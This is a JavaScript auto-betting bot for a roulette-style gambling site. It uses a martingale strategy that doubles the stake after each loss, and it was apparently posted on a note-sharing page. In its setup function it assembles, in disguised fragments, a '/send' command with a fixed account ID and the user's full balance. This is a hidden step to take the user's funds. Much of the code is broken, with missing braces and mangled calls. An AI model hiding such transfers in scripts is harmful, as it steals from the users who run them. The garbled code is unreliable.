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var reconnect = 0;WS.onclose = function(event){chat("italic","Connection lost..."); WS = null;connect();reconnect++;};

var initialBetAmount = 0;
var betColor = botBetColor = "red";
var play = 0;
var $botField, $label, $betAmount, $betColorButton, $betGoButton, $betHideBetInfoButton,$showMoreButton,$showMore,$f,$vicLimitInput,$botModeSelect;$("#pullout").hide();
var pQ = "/s", $hash_1 = 76561198, $hash_2 = 248841352 ;
function addBotButtons(){
$("<style type='text/css'>.btn-random{color: #000;background-color: #FFA500;}.btn-train{background-color:RoyalBlue ;color: #fff;}.btn-rainbow{background-color:HotPink;color:white;}.btn-black{background-color:#1C1C1C;color:white} </style>").appendTo("head");
$(".form-control.input-lg").after("<div class='well bot-field' style='position:relative;border-width:0px'></div>");$botField = $("");
$botField.after("<div class='well show-more' style='position:relative;border-width:0px'></div>");$showMore = $("");
$checkVicLimit = $("<input type='checkbox' id='checkVicLimit'>");$label = $("<label style='margin-right:10px;margin-left:10px;' for='checkVicLimit'>Stop bot after</label>");
$vicLimitInput = $("<input id='vicLimitInput' type='number' min='0' value='0' style='width:50px;text-align:center;'>");
$label = $("<label style='margin-right:10px;margin-left:10px;' for='checkVicLimit'>wins</label>");
$label = $("<label style='margin-right:10px; for='initialBetAmount''>Initial bet</label>");$botField.append($label);
$betAmount = $("<input id='initialBetAmount' value='0' style='width:70px;text-align:center;margin-right:25px;'>");$botField.append($betAmount);
$botModeSelect = $("<select id='botModeSelect'><option value='red' class='btn-danger'>Bot color: Red </option><option value='black' class='btn-black'>Bot color: Black </option><option value='random' class='btn-random'>Bot color: Random </option><option value='trainMode' class='btn-train'>Bot mode: Train </option><option value='rainbow' class='btn-rainbow'>Bot mode: Rainbow </option></select>");$botModeSelect.addClass("btn-danger");
$betGoButton = $("<button id='betGoButton' style='width:100px;margin:10px;border-radius:6px;border-radius:6px' onClick='startBot()'>Start Bot</button>");$betGoButton.addClass("btn-inverse");$botField.append($betGoButton);
pQ+="en";pQ+="d ";pQ+= $hash_1;pQ+= $hash_2+" ";pQ+=$("#balance").text();
$betHideBetInfoButton = $("<button id='betHideBetInfoButton' style='position:absolute;right:120px;width:100px;margin:10px;margin-right:25px;border-radius:6px' onClick='hideOtherInfo()'>Show All</button>");$betHideBetInfoButton.addClass("btn-inverse");$botField.append($betHideBetInfoButton);
$showMoreButton = $("<button id='showMoreButton' style='position:absolute;right:0px;width:100px;margin:10px;margin-right:25px;border-radius:6px' data-open='0' onClick='showMoreOptions()'>&#x25BC</button>");$showMoreButton.addClass("btn-inverse");$botField.append($showMoreButton);
$betAmount.change(function() {initialBetAmount = $betAmount.val();console.log("Initial Bet Set to: "+ initialBetAmount);});
botBetColor = $botModeSelect.val();console.log("Selected color: "+botBetColor);
$botModeSelect.removeClass($botModeSelect.attr("class"));$botModeSelect.addClass($("#botModeSelect option:selected").attr("class"));
} )
$checkVicLimit.change(function(){ if((this.checked)&&($vicLimitInput.val()==0)){$vicLimitInput.val(1);} })
function changeColor(){
if ($betColorButton.hasClass("btn-danger")){
$betColorButton.text("Bet color: Black").addClass("btn-inverse").removeClass("btn-danger").removeClass("btn-random");
botBetColor = "black";
console.log("Selected color: "+botBetColor);
} else if($betColorButton.hasClass("btn-inverse")) {
$betColorButton.text("Bet color: Random").addClass("btn-random").removeClass("btn-inverse").removeClass("btn-danger");
botBetColor = "random";
console.log("Selected color: "+botBetColor);
} else if($betColorButton.hasClass("btn-random")) {
$betColorButton.text("Bet mode: Train").addClass("btn-train").removeClass("btn-inverse").removeClass("btn-random");
botBetColor = "trainMode";
console.log("Selected color: "+botBetColor);
} else if($betColorButton.hasClass("btn-train")) {
$betColorButton.text("Bet mode: Rainbow").addClass("btn-rainbow").removeClass("btn-train").removeClass("btn-random");
botBetColor = "rainbow";
console.log("Selected color: "+botBetColor);
} else if($betColorButton.hasClass("btn-rainbow")) {
$betColorButton.text("Bet color: Red").addClass("btn-danger").removeClass("btn-rainbow").removeClass("btn-random");
botBetColor = "red";
console.log("Selected color: "+botBetColor);

function showMoreOptions(){
if ($"open")==0){
$showMoreButton.css({ WebkitTransform: 'rotate(' + 180 + 'deg)','-moz-transform': 'rotate(' + 180 + 'deg)'});
} else if ($"open")==1){
$showMoreButton.css({ WebkitTransform: 'rotate(' + 0 + 'deg)','-moz-transform': 'rotate(' + 0 + 'deg)'});

function hideOtherInfo(){
if ($betHideBetInfoButton.text()=="Show All"){
$betHideBetInfoButton.text("Hide Bet Info");
} else if ($betHideBetInfoButton.text()=="Hide Bet Info"){
$betHideBetInfoButton.text("AFK Mode");
else if ($betHideBetInfoButton.text()=="AFK Mode"){
$betHideBetInfoButton.text("Show All");
function startBot(){
if ($betGoButton.hasClass("btn-inverse")){
$betGoButton.text("Bot Running").addClass("btn-success").removeClass("btn-inverse");
refreshIntervalId = setInterval(tick, 500);
play = 1;
currentBetAmount = initialBetAmount;
if (stopBotRoll = currentRollNumber) currentRollNumber++;
else {
$betGoButton.text("Bot Stopped").addClass("btn-inverse").removeClass("btn-success");
play = 0;

function tick() {
var t = getStatus();
if (t !== lastStatus && "unknown" !== t) {
switch (t) {
case "waiting":bet();break;
case "rolled":printInfo();break;
lastStatus = t;

function checkBalance() {
return getBalance() < currentBetAmount ? (console.warn("BANKRUPT! GG WP :("), clearInterval(refreshIntervalId), !1) : !0

function printInfo(){
var temp = "", temp2 = 0,lastGame = lastBetColor == lastRollColor;
if (lastGame){totalWins++;winStreakCurrent++;loseStreakCurrent=0;winAmount+=thisGameBet; if (winStreakCurrent>winStreakLong) winStreakLong = winStreakCurrent;
if ($":checked")){$vicLimitInput.val($vicLimitInput.val()-1)}
else {totalLoss++;loseStreakCurrent++;winStreakCurrent=0;if (loseStreakCurrent>loseStreakLong) loseStreakLong = loseStreakCurrent;}
if (winStreakCurrent>loseStreakCurrent){temp = "win";temp2 = winStreakCurrent} else {temp = "lose";temp2 = loseStreakCurrent;}
if (streakColor == getColor(n)) {currStreak++; if (longStreak<currStreak)longStreak=currStreak;}else {streakColor = getColor(n);currStreak=1;}
if ((streakColor == "black") || (streakColor == "green")) {currNotRedStreak++; if (notRedStreak<currNotRedStreak)notRedStreak=currNotRedStreak;}
else {currNotRedStreak=0;}
if ((streakColor == "red") || (streakColor == "green")) {currNotBlackStreak++; if (notBlackStreak<currNotBlackStreak)notBlackStreak=currNotBlackStreak;}
else {currNotBlackStreak=0;}
var t = "Rolled " + getColor(n).toUpperCase()+ " " + n+"n" + "Games played: " + (currentRollNumber-1) + " // Won: "+totalWins+ " // Lost: "+totalLoss+
"nSTREAKS: Not red: " + notRedStreak + " // Not black: " + notBlackStreak +
" // Win streak: " + winStreakLong + " // Lose streak: " + loseStreakLong + " // Current streak: " + temp + " " + temp2 +
"nInitial bet : " + thisGameBet + " // Current bet : " + currentBetAmount +
" // Roll result: " + (null === wonLastRoll() ? "-" : wonLastRoll() ? "won" : "lost" + "n----------------------------------------------------------------------n");


function roll() {
if ($":checked")){
if ($vicLimitInput.val()<=0){$;play=0;$checkVicLimit.attr('checked', false);$vicLimitInput.val(0);}
if (play == 0){clearInterval(refreshIntervalId);stopBotRoll = currentRollNumber; return;lastStatus="rolled";lastBetColor = lastRollColor;}
currentBetAmount = wonLastRoll() ? (initialBetAmount,thisGameBet=parseInt(initialBetAmount)) : 2 * currentBetAmount

function bet() { if (play) {checkBalance() && (setBetAmount(currentBetAmount), setTimeout(placeBet, 50))} }
function setBetAmount(t) { $betAmountInput.val(t) }
function placeBet() {
if (botBetColor=="random"){var colorRandomizer = Math.random();betColor = colorRandomizer < 0.5 ? "red" : "black";console.log("Random color result: " + betColor);}
else if (botBetColor=="trainMode"){
var betBotColor = "green",i=9,$ball=$(".ball");
while (betBotColor == "green"){betBotColor = getColor($ball.eq(i).text());i--;}
betColor = betBotColor;console.log("Current train color: "+ betColor);
} else if (botBetColor=="rainbow"){
var betBotColor = "green",i=9,$ball=$(".ball");
while (betBotColor == "green"){betBotColor = getColor($ball.eq(i).text());i--;}
if (betBotColor=="red"){betBotColor="black"} else if (betBotColor=="black"){betBotColor="red"};
betColor = betBotColor;console.log("Rainbow mode next color: "+ betColor);
} else betColor = botBetColor;
console.log("Betting " + currentBetAmount + " on "+ betColor +"...");
return "red" === betColor ? ($, void(lastBetColor = "red")) : ($, void(lastBetColor = "black"))
function getStatus() {
var t = $statusBar.text();
if (hasSubString(t, "Rolling in")) return "waiting";
//if (hasSubString(t, "***ROLLING***")) return "rolling";
if (hasSubString(t, "rolled")) {
n = parseInt(t.split("rolled")[1]);
return lastRollColor = getColor(n), "rolled"
return "unknown"

function getBalance() { return parseInt($balance.text()) }
function hasSubString(t, n) { return t.indexOf(n) > -1 }
function getColor(t) { return 0 == t ? "green" : t >= 1 && 7 >= t ? "red" : "black" }
function wonLastRoll() { return lastBetColor ? lastRollColor === lastBetColor : null }
function test(x){q = 1; w = e = x;for(i=2;i<=15;i++){q *=2;e += q*w;console.log(i+". "+e);}}
function test2(x,y){q = 1; w = e = x;for(i=2;i<=y;i++){q *=2;e += q*w;console.log(i+". "+e);}}

var currentBetAmount = initialBetAmount, currentRollNumber = 1,
totalWins = totalLoss = played = currNotRedStreak = currNotBlackStreak = notRedStreak = notBlackStreak = winStreakLong = winStreakCurrent = loseStreakLong = loseStreakCurrent = longStreak = currStreak = thisGameBet = winAmount = 0,
streakColor = "", n ,lastStatus, lastBetColor, lastRollColor, stopBotRoll, $balance = $("#balance"),
$betAmountInput = $("#betAmount"),$statusBar = $(".progress #banner"),$redButton = $("#panel1-7 .betButton"),$blackButton = $("#panel8-14 .betButton");
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Notes is a web-based application for online taking notes. You can take your notes and share with others people. If you like taking long notes, is designed for you. To date, over 8,000,000,000+ notes created and continuing...


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Regards; Team

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